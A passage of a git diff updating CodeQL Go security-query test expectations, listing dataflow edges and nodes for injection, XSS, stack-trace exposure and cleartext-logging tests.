| StoredCommand.go:13:12:13:19 | &... | provenance | | +| StoredCommand.go:13:12:13:19 | &... | StoredCommand.go:13:2:13:20 | []type{args} [array] | provenance | | | StoredCommand.go:13:12:13:19 | &... | StoredCommand.go:14:22:14:28 | cmdName | provenance | Sink:MaD:1 | models | 1 | Sink: os/exec; ; false; Command; ; ; Argument[0]; command-injection; manual | nodes | StoredCommand.go:11:2:11:27 | ... := ...[0] | semmle.label | ... := ...[0] | | StoredCommand.go:13:2:13:5 | rows | semmle.label | rows | +| StoredCommand.go:13:2:13:20 | []type{args} [array] | semmle.label | []type{args} [array] | | StoredCommand.go:13:12:13:19 | &... | semmle.label | &... | | StoredCommand.go:14:22:14:28 | cmdName | semmle.label | cmdName | subpaths diff --git a/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected b/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected index 647113f3c6b..321b1740c23 100644 --- a/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected +++ b/go/ql/test/query-tests/Security/CWE-079/ReflectedXss.expected @@ -32,8 +32,10 @@ edges | contenttype.go:113:10:113:28 | call to FormValue | contenttype.go:114:50:114:53 | data | provenance | Src:MaD:8 | | reflectedxsstest.go:31:2:31:44 | ... := ...[0] | reflectedxsstest.go:32:34:32:37 | file | provenance | Src:MaD:7 | | reflectedxsstest.go:31:2:31:44 | ... := ...[1] | reflectedxsstest.go:34:46:34:60 | selection of Filename | provenance | Src:MaD:7 | +| reflectedxsstest.go:32:2:32:8 | definition of content | reflectedxsstest.go:33:49:33:55 | content | provenance | | | reflectedxsstest.go:32:2:32:38 | ... := ...[0] | reflectedxsstest.go:33:49:33:55 | content | provenance | | | reflectedxsstest.go:32:34:32:37 | file | reflectedxsstest.go:32:2:32:38 | ... := ...[0] | provenance | MaD:13 | +| reflectedxsstest.go:33:17:33:56 | []type{args} [array] | reflectedxsstest.go:32:2:32:8 | definition of content | provenance | | | reflectedxsstest.go:33:17:33:56 | []type{args} [array] | reflectedxsstest.go:33:17:33:56 | call to Sprintf | provenance | MaD:12 | | reflectedxsstest.go:33:17:33:56 | call to Sprintf | reflectedxsstest.go:33:10:33:57 | type conversion | provenance | | | reflectedxsstest.go:33:49:33:55 | content | reflectedxsstest.go:33:17:33:56 | []type{args} [array] | provenance | | @@ -63,11 +65,33 @@ edges | tst.go:48:14:48:19 | selection of Form | tst.go:48:14:48:34 | call to Get | provenance | Src:MaD:6 MaD:18 | | tst.go:48:14:48:34 | call to Get | tst.go:53:12:53:26 | type conversion | provenance | | | websocketXss.go:30:7:30:10 | definition of xnet | websocketXss.go:32:24:32:27 | xnet | provenance | Src:MaD:5 | +| websocketXss.go:30:7:30:10 | definition of xnet | websocketXss.go:32:24:32:27 | xnet | provenance | Src:MaD:5 | +| websocketXss.go:32:3:32:28 | []type{args} [array] | websocketXss.go:30:7:30:10 | definition of xnet | provenance | | +| websocketXss.go:32:24:32:27 | xnet | websocketXss.go:32:3:32:28 | []type{args} [array] | provenance | | | websocketXss.go:34:3:34:7 | definition of xnet2 | websocketXss.go:36:24:36:28 | xnet2 | provenance | Src:MaD:4 | +| websocketXss.go:34:3:34:7 | definition of xnet2 | websocketXss.go:36:24:36:28 | xnet2 | provenance | Src:MaD:4 | +| websocketXss.go:36:3:36:29 | []type{args} [array] | websocketXss.go:34:3:34:7 | definition of xnet2 | provenance | | +| websocketXss.go:36:24:36:28 | xnet2 | websocketXss.go:36:3:36:29 | []type{args} [array] | provenance | | | websocketXss.go:40:3:40:40 | ... := ...[1] | websocketXss.go:41:24:41:29 | nhooyr | provenance | Src:MaD:11 | +| websocketXss.go:40:3:40:40 | ... := ...[1] | websocketXss.go:41:24:41:29 | nhooyr | provenance | Src:MaD:11 | +| websocketXss.go:40:6:40:11 | definition of nhooyr | websocketXss.go:41:24:41:29 | nhooyr | provenance | | +| websocketXss.go:40:6:40:11 | definition of nhooyr | websocketXss.go:41:24:41:29 | nhooyr | provenance | | +| websocketXss.go:41:3:41:30 | []type{args} [array] | websocketXss.go:40:6:40:11 | definition of nhooyr | provenance | | +| websocketXss.go:41:24:41:29 | nhooyr | websocketXss.go:41:3:41:30 | []type{args} [array] | provenance | | | websocketXss.go:46:7:46:16 | definition of gorillaMsg | websocketXss.go:48:24:48:33 | gorillaMsg | provenance | Src:MaD:1 | +| websocketXss.go:46:7:46:16 | definition of gorillaMsg | websocketXss.go:48:24:48:33 | gorillaMsg | provenance | Src:MaD:1 | +| websocketXss.go:48:3:48:34 | []type{args} [array] | websocketXss.go:46:7:46:16 | definition of gorillaMsg | provenance | | +| websocketXss.go:48:24:48:33 | gorillaMsg | websocketXss.go:48:3:48:34 | []type{args} [array] | provenance | | | websocketXss.go:50:3:50:10 | definition of gorilla2 | websocketXss.go:52:24:52:31 | gorilla2 | provenance | Src:MaD:2 | +| websocketXss.go:50:3:50:10 | definition of gorilla2 | websocketXss.go:52:24:52:31 | gorilla2 | provenance | Src:MaD:2 | +| websocketXss.go:52:3:52:32 | []type{args} [array] | websocketXss.go:50:3:50:10 | definition of gorilla2 | provenance | | +| websocketXss.go:52:24:52:31 | gorilla2 | websocketXss.go:52:3:52:32 | []type{args} [array] | provenance | | | websocketXss.go:54:3:54:38 | ... := ...[1] | websocketXss.go:55:24:55:31 | gorilla3 | provenance | Src:MaD:3 | +| websocketXss.go:54:3:54:38 | ... := ...[1] | websocketXss.go:55:24:55:31 | gorilla3 | provenance | Src:MaD:3 | +| websocketXss.go:54:6:54:13 | definition of gorilla3 | websocketXss.go:55:24:55:31 | gorilla3 | provenance | | +| websocketXss.go:54:6:54:13 | definition of gorilla3 | websocketXss.go:55:24:55:31 | gorilla3 | provenance | | +| websocketXss.go:55:3:55:32 | []type{args} [array] | websocketXss.go:54:6:54:13 | definition of gorilla3 | provenance | | +| websocketXss.go:55:24:55:31 | gorilla3 | websocketXss.go:55:3:55:32 | []type{args} [array] | provenance | | models | 1 | Source: github.com/gorilla/websocket; ; false; ReadJSON; ; ; Argument[1]; remote; manual | | 2 | Source: github.com/gorilla/websocket; Conn; true; ReadJSON; ; ; Argument[0]; remote; manual | @@ -108,6 +132,7 @@ nodes | contenttype.go:114:50:114:53 | data | semmle.label | data | | reflectedxsstest.go:31:2:31:44 | ... := ...[0] | semmle.label | ... := ...[0] | | reflectedxsstest.go:31:2:31:44 | ... := ...[1] | semmle.label | ... := ...[1] | +| reflectedxsstest.go:32:2:32:8 | definition of content | semmle.label | definition of content | | reflectedxsstest.go:32:2:32:38 | ... := ...[0] | semmle.label | ... := ...[0] | | reflectedxsstest.go:32:34:32:37 | file | semmle.label | file | | reflectedxsstest.go:33:10:33:57 | type conversion | semmle.label | type conversion | @@ -142,15 +167,29 @@ nodes | tst.go:48:14:48:34 | call to Get | semmle.label | call to Get | | tst.go:53:12:53:26 | type conversion | semmle.label | type conversion | | websocketXss.go:30:7:30:10 | definition of xnet | semmle.label | definition of xnet | +| websocketXss.go:32:3:32:28 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:32:24:32:27 | xnet | semmle.label | xnet | | websocketXss.go:32:24:32:27 | xnet | semmle.label | xnet | | websocketXss.go:34:3:34:7 | definition of xnet2 | semmle.label | definition of xnet2 | +| websocketXss.go:36:3:36:29 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:36:24:36:28 | xnet2 | semmle.label | xnet2 | | websocketXss.go:36:24:36:28 | xnet2 | semmle.label | xnet2 | | websocketXss.go:40:3:40:40 | ... := ...[1] | semmle.label | ... := ...[1] | +| websocketXss.go:40:6:40:11 | definition of nhooyr | semmle.label | definition of nhooyr | +| websocketXss.go:41:3:41:30 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:41:24:41:29 | nhooyr | semmle.label | nhooyr | | websocketXss.go:41:24:41:29 | nhooyr | semmle.label | nhooyr | | websocketXss.go:46:7:46:16 | definition of gorillaMsg | semmle.label | definition of gorillaMsg | +| websocketXss.go:48:3:48:34 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:48:24:48:33 | gorillaMsg | semmle.label | gorillaMsg | | websocketXss.go:48:24:48:33 | gorillaMsg | semmle.label | gorillaMsg | | websocketXss.go:50:3:50:10 | definition of gorilla2 | semmle.label | definition of gorilla2 | +| websocketXss.go:52:3:52:32 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:52:24:52:31 | gorilla2 | semmle.label | gorilla2 | | websocketXss.go:52:24:52:31 | gorilla2 | semmle.label | gorilla2 | | websocketXss.go:54:3:54:38 | ... := ...[1] | semmle.label | ... := ...[1] | +| websocketXss.go:54:6:54:13 | definition of gorilla3 | semmle.label | definition of gorilla3 | +| websocketXss.go:55:3:55:32 | []type{args} [array] | semmle.label | []type{args} [array] | +| websocketXss.go:55:24:55:31 | gorilla3 | semmle.label | gorilla3 | | websocketXss.go:55:24:55:31 | gorilla3 | semmle.label | gorilla3 | subpaths diff --git a/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected b/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected index efe98650a4e..ebeedf3d0ef 100644 --- a/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected +++ b/go/ql/test/query-tests/Security/CWE-079/StoredXss.expected @@ -1,7 +1,12 @@ edges | StoredXss.go:13:21:13:31 | call to Name | StoredXss.go:13:21:13:36 | ...+... | provenance | | | stored.go:18:3:18:28 | ... := ...[0] | stored.go:25:14:25:17 | rows | provenance | | +| stored.go:25:14:25:17 | rows | stored.go:25:24:25:26 | &... | provenance | FunctionModel | | stored.go:25:14:25:17 | rows | stored.go:25:29:25:33 | &... | provenance | FunctionModel | +| stored.go:25:14:25:34 | []type{args} [array] | stored.go:25:24:25:26 | &... | provenance | | +| stored.go:25:14:25:34 | []type{args} [array] | stored.go:25:29:25:33 | &... | provenance | | +| stored.go:25:24:25:26 | &... | stored.go:25:14:25:34 | []type{args} [array] | provenance | | +| stored.go:25:29:25:33 | &... | stored.go:25:14:25:34 | []type{args} [array] | provenance | | | stored.go:25:29:25:33 | &... | stored.go:30:22:30:25 | name | provenance | | | stored.go:59:30:59:33 | definition of path | stored.go:61:22:61:25 | path | provenance | | nodes @@ -9,6 +14,8 @@ nodes | StoredXss.go:13:21:13:36 | ...+... | semmle.label | ...+... | | stored.go:18:3:18:28 | ... := ...[0] | semmle.label | ... := ...[0] | | stored.go:25:14:25:17 | rows | semmle.label | rows | +| stored.go:25:14:25:34 | []type{args} [array] | semmle.label | []type{args} [array] | +| stored.go:25:24:25:26 | &... | semmle.label | &... | | stored.go:25:29:25:33 | &... | semmle.label | &... | | stored.go:30:22:30:25 | name | semmle.label | name | | stored.go:59:30:59:33 | definition of path | semmle.label | definition of path | diff --git a/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 1ce8c3d1dcf..9a7084ac836 100644 --- a/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/go/ql/test/query-tests/Security/CWE-089/SqlInjection.expected @@ -26,6 +26,7 @@ | mongoDB.go:81:18:81:25 | pipeline | mongoDB.go:40:20:40:30 | call to Referer | mongoDB.go:81:18:81:25 | pipeline | This query depends on a $@. | mongoDB.go:40:20:40:30 | call to Referer | user-provided value | edges | SqlInjection.go:10:7:11:30 | []type{args} [array] | SqlInjection.go:10:7:11:30 | call to Sprintf | provenance | MaD:23 | +| SqlInjection.go:10:7:11:30 | []type{args} [array] | SqlInjection.go:11:3:11:29 | index expression | provenance | | | SqlInjection.go:10:7:11:30 | call to Sprintf | SqlInjection.go:12:11:12:11 | q | provenance | Sink:MaD:1 | | SqlInjection.go:11:3:11:9 | selection of URL | SqlInjection.go:11:3:11:17 | call to Query | provenance | Src:MaD:21 MaD:26 | | SqlInjection.go:11:3:11:17 | call to Query | SqlInjection.go:11:3:11:29 | index expression | provenance | | @@ -36,6 +37,7 @@ edges | issue48.go:18:17:18:17 | b | issue48.go:18:20:18:39 | &... | provenance | MaD:22 | | issue48.go:18:20:18:39 | &... | issue48.go:21:3:21:33 | index expression | provenance | | | issue48.go:20:8:21:34 | []type{args} [array] | issue48.go:20:8:21:34 | call to Sprintf | provenance | MaD:23 | +| issue48.go:20:8:21:34 | []type{args} [array] | issue48.go:21:3:21:33 | index expression | provenance | | | issue48.go:20:8:21:34 | call to Sprintf | issue48.go:22:11:22:12 | q3 | provenance | Sink:MaD:1 | | issue48.go:21:3:21:33 | index expression | issue48.go:20:8:21:34 | []type{args} [array] | provenance | | | issue48.go:21:3:21:33 | index expression | issue48.go:20:8:21:34 | call to Sprintf | provenance | FunctionModel | @@ -44,6 +46,7 @@ edges | issue48.go:28:17:28:18 | b2 | issue48.go:28:21:28:41 | &... | provenance | MaD:22 | | issue48.go:28:21:28:41 | &... | issue48.go:31:3:31:31 | selection of Category | provenance | | | issue48.go:30:8:31:32 | []type{args} [array] | issue48.go:30:8:31:32 | call to Sprintf | provenance | MaD:23 | +| issue48.go:30:8:31:32 | []type{args} [array] | issue48.go:31:3:31:31 | selection of Category | provenance | | | issue48.go:30:8:31:32 | call to Sprintf | issue48.go:32:11:32:12 | q4 | provenance | Sink:MaD:1 | | issue48.go:31:3:31:31 | selection of Category | issue48.go:30:8:31:32 | []type{args} [array] | provenance | | | issue48.go:31:3:31:31 | selection of Category | issue48.go:30:8:31:32 | call to Sprintf | provenance | FunctionModel | @@ -52,11 +55,13 @@ edges | issue48.go:37:24:37:38 | call to Query | issue48.go:37:17:37:50 | type conversion | provenance | | | issue48.go:37:53:37:73 | &... | issue48.go:40:3:40:31 | selection of Category | provenance | | | issue48.go:39:8:40:32 | []type{args} [array] | issue48.go:39:8:40:32 | call to Sprintf | provenance | MaD:23 | +| issue48.go:39:8:40:32 | []type{args} [array] | issue48.go:40:3:40:31 | selection of Category | provenance | | | issue48.go:39:8:40:32 | call to Sprintf | issue48.go:41:11:41:12 | q5 | provenance | Sink:MaD:1 | | issue48.go:40:3:40:31 | selection of Category | issue48.go:39:8:40:32 | []type{args} [array] | provenance | | | issue48.go:40:3:40:31 | selection of Category | issue48.go:39:8:40:32 | call to Sprintf | provenance | FunctionModel | | main.go:11:11:11:16 | selection of Form | main.go:11:11:11:28 | index expression | provenance | Src:MaD:18 Sink:MaD:1 | | main.go:15:11:15:84 | []type{args} [array] | main.go:15:11:15:84 | call to Sprintf | provenance | MaD:23 Sink:MaD:2 | +| main.go:15:11:15:84 | []type{args} [array] | main.go:15:63:15:83 | index expression | provenance | | | main.go:15:63:15:67 | selection of URL | main.go:15:63:15:75 | call to Query | provenance | Src:MaD:21 MaD:26 | | main.go:15:63:15:75 | call to Query | main.go:15:63:15:83 | index expression | provenance | | | main.go:15:63:15:83 | index expression | main.go:15:11:15:84 | []type{args} [array] | provenance | | @@ -71,6 +76,7 @@ edges | main.go:30:13:30:27 | call to Query | main.go:30:13:30:39 | index expression | provenance | | | main.go:30:13:30:39 | index expression | main.go:28:18:31:2 | struct literal [Category] | provenance | | | main.go:33:7:34:23 | []type{args} [array] | main.go:33:7:34:23 | call to Sprintf | provenance | MaD:23 | +| main.go:33:7:34:23 | []type{args} [array] | main.go:34:3:34:22 | selection of Category | provenance | | | main.go:33:7:34:23 | call to Sprintf | main.go:35:11:35:11 | q | provenance | Sink:MaD:1 | | main.go:34:3:34:13 | RequestData [pointer, Category] | main.go:34:3:34:13 | implicit dereference [Category] | provenance | | | main.go:34:3:34:13 | implicit dereference [Category] | main.go:34:3:34:22 | selection of Category | provenance | | @@ -84,6 +90,7 @@ edges | main.go:40:25:40:39 | call to Query | main.go:40:25:40:51 | index expression | provenance | | | main.go:40:25:40:51 | index expression | main.go:40:2:40:12 | implicit dereference [Category] | provenance | | | main.go:42:7:43:23 | []type{args} [array] | main.go:42:7:43:23 | call to Sprintf | provenance | MaD:23 | +| main.go:42:7:43:23 | []type{args} [array] | main.go:43:3:43:22 | selection of Category | provenance | | | main.go:42:7:43:23 | call to Sprintf | main.go:44:11:44:11 | q | provenance | Sink:MaD:1 | | main.go:43:3:43:13 | RequestData [pointer, Category] | main.go:43:3:43:13 | implicit dereference [Category] | provenance | | | main.go:43:3:43:13 | implicit dereference [Category] | main.go:43:3:43:22 | selection of Category | provenance | | @@ -97,6 +104,7 @@ edges | main.go:49:28:49:42 | call to Query | main.go:49:28:49:54 | index expression | provenance | | | main.go:49:28:49:54 | index expression | main.go:49:3:49:14 | star expression [Category] | provenance | | | main.go:51:7:52:23 | []type{args} [array] | main.go:51:7:52:23 | call to Sprintf | provenance | MaD:23 | +| main.go:51:7:52:23 | []type{args} [array] | main.go:52:3:52:22 | selection of Category | provenance | | | main.go:51:7:52:23 | call to Sprintf | main.go:53:11:53:11 | q | provenance | Sink:MaD:1 | | main.go:52:3:52:13 | RequestData [pointer, Category] | main.go:52:3:52:13 | implicit dereference [Category] | provenance | | | main.go:52:3:52:13 | implicit dereference [Category] | main.go:52:3:52:22 | selection of Category | provenance | | @@ -110,6 +118,7 @@ edges | main.go:58:28:58:42 | call to Query | main.go:58:28:58:54 | index expression | provenance | | | main.go:58:28:58:54 | index expression | main.go:58:3:58:14 | star expression [Category] | provenance | | | main.go:60:7:61:26 | []type{args} [array] | main.go:60:7:61:26 | call to Sprintf | provenance | MaD:23 | +| main.go:60:7:61:26 | []type{args} [array] | main.go:61:3:61:25 | selection of Category | provenance | | | main.go:60:7:61:26 | call to Sprintf | main.go:62:11:62:11 | q | provenance | Sink:MaD:1 | | main.go:61:3:61:25 | selection of Category | main.go:60:7:61:26 | []type{args} [array] | provenance | | | main.go:61:3:61:25 | selection of Category | main.go:60:7:61:26 | call to Sprintf | provenance | FunctionModel | diff --git a/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected b/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected index 5deab249337..a3d0c59798f 100644 --- a/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected +++ b/go/ql/test/query-tests/Security/CWE-089/StringBreak.expected @@ -3,7 +3,12 @@ | StringBreakMismatched.go:17:26:17:32 | escaped | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | StringBreakMismatched.go:17:26:17:32 | escaped | If this $@ contains a single quote, it could break out of the enclosing quotes. | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | JSON value | | StringBreakMismatched.go:29:27:29:33 | escaped | StringBreakMismatched.go:24:2:24:40 | ... := ...[0] | StringBreakMismatched.go:29:27:29:33 | escaped | If this $@ contains a double quote, it could break out of the enclosing quotes. | StringBreakMismatched.go:24:2:24:40 | ... := ...[0] | JSON value | edges +| StringBreak.go:10:2:10:12 | definition of versionJSON | StringBreak.go:14:47:14:57 | versionJSON | provenance | | +| StringBreak.go:10:2:10:12 | definition of versionJSON | StringBreak.go:14:47:14:57 | versionJSON | provenance | | | StringBreak.go:10:2:10:40 | ... := ...[0] | StringBreak.go:14:47:14:57 | versionJSON | provenance | | +| StringBreak.go:10:2:10:40 | ... := ...[0] | StringBreak.go:14:47:14:57 | versionJSON | provenance | | +| StringBreak.go:14:22:14:58 | []type{args} [array] | StringBreak.go:10:2:10:12 | definition of versionJSON | provenance | | +| StringBreak.go:14:47:14:57 | versionJSON | StringBreak.go:14:22:14:58 | []type{args} [array] | provenance | | | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | StringBreakMismatched.go:13:29:13:47 | type conversion | provenance | | | StringBreakMismatched.go:13:13:13:62 | call to Replace | StringBreakMismatched.go:17:26:17:32 | escaped | provenance | | | StringBreakMismatched.go:13:29:13:47 | type conversion | StringBreakMismatched.go:13:13:13:62 | call to Replace | provenance | MaD:1 | @@ -13,7 +18,10 @@ edges models | 1 | Summary: strings; ; false; Replace; ; ; Argument[0]; ReturnValue; taint; manual | nodes +| StringBreak.go:10:2:10:12 | definition of versionJSON | semmle.label | definition of versionJSON | | StringBreak.go:10:2:10:40 | ... := ...[0] | semmle.label | ... := ...[0] | +| StringBreak.go:14:22:14:58 | []type{args} [array] | semmle.label | []type{args} [array] | +| StringBreak.go:14:47:14:57 | versionJSON | semmle.label | versionJSON | | StringBreak.go:14:47:14:57 | versionJSON | semmle.label | versionJSON | | StringBreakMismatched.go:12:2:12:40 | ... := ...[0] | semmle.label | ... := ...[0] | | StringBreakMismatched.go:13:13:13:62 | call to Replace | semmle.label | call to Replace | diff --git a/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected b/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected index c62c6126648..b3396e7451b 100644 --- a/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected +++ b/go/ql/test/query-tests/Security/CWE-209/StackTraceExposure.expected @@ -1,8 +1,16 @@ edges | test.go:14:2:14:4 | definition of buf | test.go:17:10:17:12 | buf | provenance | | +| test.go:14:2:14:4 | definition of buf | test.go:20:29:20:31 | buf | provenance | | +| test.go:15:2:15:4 | definition of buf | test.go:17:10:17:12 | buf | provenance | | +| test.go:15:2:15:4 | definition of buf | test.go:20:29:20:31 | buf | provenance | | +| test.go:20:2:20:32 | []type{args} [array] | test.go:15:2:15:4 | definition of buf | provenance | | +| test.go:20:29:20:31 | buf | test.go:20:2:20:32 | []type{args} [array] | provenance | | nodes | test.go:14:2:14:4 | definition of buf | semmle.label | definition of buf | +| test.go:15:2:15:4 | definition of buf | semmle.label | definition of buf | | test.go:17:10:17:12 | buf | semmle.label | buf | +| test.go:20:2:20:32 | []type{args} [array] | semmle.label | []type{args} [array] | +| test.go:20:29:20:31 | buf | semmle.label | buf | subpaths #select | test.go:17:10:17:12 | buf | test.go:14:2:14:4 | definition of buf | test.go:17:10:17:12 | buf | HTTP response depends on $@ and may be exposed to an external user. | test.go:14:2:14:4 | definition of buf | stack trace information | diff --git a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected index 3435eff7775..31f709e456f 100644 --- a/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected +++ b/go/ql/test/query-tests/Security/CWE-312/CleartextLogging.expected @@ -64,28 +64,61 @@ edges | passwords.go:8:12:8:12 | definition of x | passwords.go:9:14:9:14 | x | provenance | | | passwords.go:30:8:30:15 | password | passwords.go:8:12:8:12 | definition of x | provenance | | | passwords.go:34:28:34:35 | password | passwords.go:34:14:34:35 | ...+... | provenance | Config | +| passwords.go:36:2:36:5 | definition of obj1 | passwords.go:39:14:39:17 | obj1 | provenance | | +| passwords.go:36:2:36:5 | definition of obj1 | passwords.go:39:14:39:17 | obj1 | provenance | | +| passwords.go:36:10:38:2 | struct literal | passwords.go:39:14:39:17 | obj1 | provenance | | | passwords.go:36:10:38:2 | struct literal | passwords.go:39:14:39:17 | obj1 | provenance | | | passwords.go:37:13:37:13 | x | passwords.go:36:10:38:2 | struct literal | provenance | Config | +| passwords.go:39:2:39:18 | []type{args} [array] | passwords.go:36:2:36:5 | definition of obj1 | provenance | | +| passwords.go:39:14:39:17 | obj1 | passwords.go:39:2:39:18 | []type{args} [array] | provenance | | +| passwords.go:41:2:41:5 | definition of obj2 | passwords.go:44:14:44:17 | obj2 | provenance | | +| passwords.go:41:2:41:5 | definition of obj2 | passwords.go:44:14:44:17 | obj2 | provenance | | +| passwords.go:41:10:43:2 | struct literal | passwords.go:44:14:44:17 | obj2 | provenance | | | passwords.go:41:10:43:2 | struct literal | passwords.go:44:14:44:17 | obj2 | provenance | | | passwords.go:42:6:42:13 | password | passwords.go:41:10:43:2 | struct literal | provenance | Config | +| passwords.go:44:2:44:18 | []type{args} [array] | passwords.go:41:2:41:5 | definition of obj2 | provenance | | +| passwords.go:44:14:44:17 | obj2 | passwords.go:44:2:44:18 | []type{args} [array] | provenance | | | passwords.go:46:6:46:9 | definition of obj3 | passwords.go:47:14:47:17 | obj3 | provenance | | +| passwords.go:46:6:46:9 | definition of obj3 | passwords.go:47:14:47:17 | obj3 | provenance | | +| passwords.go:47:2:47:18 | []type{args} [array] | passwords.go:46:6:46:9 | definition of obj3 | provenance | | +| passwords.go:47:14:47:17 | obj3 | passwords.go:47:2:47:18 | []type{args} [array] | provenance | | | passwords.go:48:11:48:18 | password | passwords.go:46:6:46:9 | definition of obj3 | provenance | Config | +| passwords.go:85:2:85:14 | definition of utilityObject | passwords.go:88:14:88:26 | utilityObject | provenance | | +| passwords.go:85:2:85:14 | definition of utilityObject | passwords.go:88:14:88:26 | utilityObject | provenance | | +| passwords.go:85:19:87:2 | struct literal | passwords.go:88:14:88:26 | utilityObject | provenance | | | passwords.go:85:19:87:2 | struct literal | passwords.go:88:14:88:26 | utilityObject | provenance | | | passwords.go:86:16:86:36 | call to make | passwords.go:85:19:87:2 | struct literal | provenance | Config | +| passwords.go:88:2:88:27 | []type{args} [array] | passwords.go:85:2:85:14 | definition of utilityObject | provenance | | +| passwords.go:88:14:88:26 | utilityObject | passwords.go:88:2:88:27 | []type{args} [array] | provenance | | | passwords.go:90:12:90:19 | password | passwords.go:91:23:91:28 | secret | provenance | | | passwords.go:101:33:101:40 | password | passwords.go:101:15:101:40 | ...+... | provenance | Config | | passwords.go:107:34:107:41 | password | passwords.go:107:16:107:41 | ...+... | provenance | Config | | passwords.go:112:33:112:40 | password | passwords.go:112:15:112:40 | ...+... | provenance | Config | | passwords.go:116:28:116:36 | password1 | passwords.go:116:28:116:45 | call to String | provenance | Config | | passwords.go:116:28:116:45 | call to String | passwords.go:116:14:116:45 | ...+... | provenance | Config | +| passwords.go:118:2:118:7 | definition of config | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:2:118:7 | definition of config | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:2:118:7 | definition of config [x] | passwords.go:125:14:125:19 | config [x] | provenance | | +| passwords.go:118:2:118:7 | definition of config [x] | passwords.go:126:14:126:19 | config [x] | provenance | | +| passwords.go:118:2:118:7 | definition of config [y] | passwords.go:125:14:125:19 | config [y] | provenance | | +| passwords.go:118:2:118:7 | definition of config [y] | passwords.go:127:14:127:19 | config [y] | provenance | | | passwords.go:118:12:123:2 | struct literal | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:12:123:2 | struct literal | passwords.go:125:14:125:19 | config | provenance | | +| passwords.go:118:12:123:2 | struct literal [x] | passwords.go:125:14:125:19 | config [x] | provenance | | | passwords.go:118:12:123:2 | struct literal [x] | passwords.go:126:14:126:19 | config [x] | provenance | | +| passwords.go:118:12:123:2 | struct literal [y] | passwords.go:125:14:125:19 | config [y] | provenance | | | passwords.go:118:12:123:2 | struct literal [y] | passwords.go:127:14:127:19 | config [y] | provenance | | | passwords.go:119:13:119:13 | x | passwords.go:118:12:123:2 | struct literal | provenance | Config | | passwords.go:121:13:121:20 | password | passwords.go:118:12:123:2 | struct literal | provenance | Config | | passwords.go:121:13:121:20 | password | passwords.go:118:12:123:2 | struct literal [x] | provenance | | | passwords.go:122:13:122:25 | call to getPassword | passwords.go:118:12:123:2 | struct literal | provenance | Config | | passwords.go:122:13:122:25 | call to getPassword | passwords.go:118:12:123:2 | struct literal [y] | provenance | | +| passwords.go:125:2:125:20 | []type{args} [array, x] | passwords.go:118:2:118:7 | definition of config [x] | provenance | | +| passwords.go:125:2:125:20 | []type{args} [array, y] | passwords.go:118:2:118:7 | definition of config [y] | provenance | | +| passwords.go:125:2:125:20 | []type{args} [array] | passwords.go:118:2:118:7 | definition of config | provenance | | +| passwords.go:125:14:125:19 | config | passwords.go:125:2:125:20 | []type{args} [array] | provenance | | +| passwords.go:125:14:125:19 | config [x] | passwords.go:125:2:125:20 | []type{args} [array, x] | provenance | | +| passwords.go:125:14:125:19 | config [y] | passwords.go:125:2:125:20 | []type{args} [array, y] | provenance | | | passwords.go:126:14:126:19 | config [x] | passwords.go:126:14:126:21 | selection of x | provenance | | | passwords.go:127:14:127:19 | config [y] | passwords.go:127:14:127:21 | selection of y | provenance | | | protobuf.go:11:2:11:6 | definition of query [pointer, Description] | protobuf.go:12:2:12:6 | query [pointer, Description] | provenance | | @@ -149,18 +182,29 @@ nodes | passwords.go:32:12:32:19 | password | semmle.label | password | | passwords.go:34:14:34:35 | ...+... | semmle.label | ...+... | | passwords.go:34:28:34:35 | password | semmle.label | password | +| passwords.go:36:2:36:5 | definition of obj1 | semmle.label | definition of obj1 | | passwords.go:36:10:38:2 | struct literal | semmle.label | struct literal | | passwords.go:37:13:37:13 | x | semmle.label | x | +| passwords.go:39:2:39:18 | []type{args} [array] | semmle.label | []type{args} [array] | | passwords.go:39:14:39:17 | obj1 | semmle.label | obj1 | +| passwords.go:39:14:39:17 | obj1 | semmle.label | obj1 | +| passwords.go:41:2:41:5 | definition of obj2 | semmle.label | definition of obj2 | | passwords.go:41:10:43:2 | struct literal | semmle.label | struct literal | | passwords.go:42:6:42:13 | password | semmle.label | password | +| passwords.go:44:2:44:18 | []type{args} [array] | semmle.label | []type{args} [array] | +| passwords.go:44:14:44:17 | obj2 | semmle.label | obj2 | | passwords.go:44:14:44:17 | obj2 | semmle.label | obj2 | | passwords.go:46:6:46:9 | definition of obj3 | semmle.label | definition of obj3 | +| passwords.go:47:2:47:18 | []type{args} [array] | semmle.label | []type{args} [array] | +| passwords.go:47:14:47:17 | obj3 | semmle.label | obj3 | | passwords.go:47:14:47:17 | obj3 | semmle.label | obj3 | | passwords.go:48:11:48:18 | password | semmle.label | password | | passwords.go:51:14:51:27 | fixed_password | semmle.label | fixed_password | +| passwords.go:85:2:85:14 | definition of utilityObject | semmle.label | definition of utilityObject | | passwords.go:85:19:87:2 | struct literal | semmle.label | struct literal | | passwords.go:86:16:86:36 | call to make | semmle.label | call to make | +| passwords.go:88:2:88:27 | []type{args} [array] | semmle.label | []type{args} [array] | +| passwords.go:88:14:88:26 | utilityObject | semmle.label | 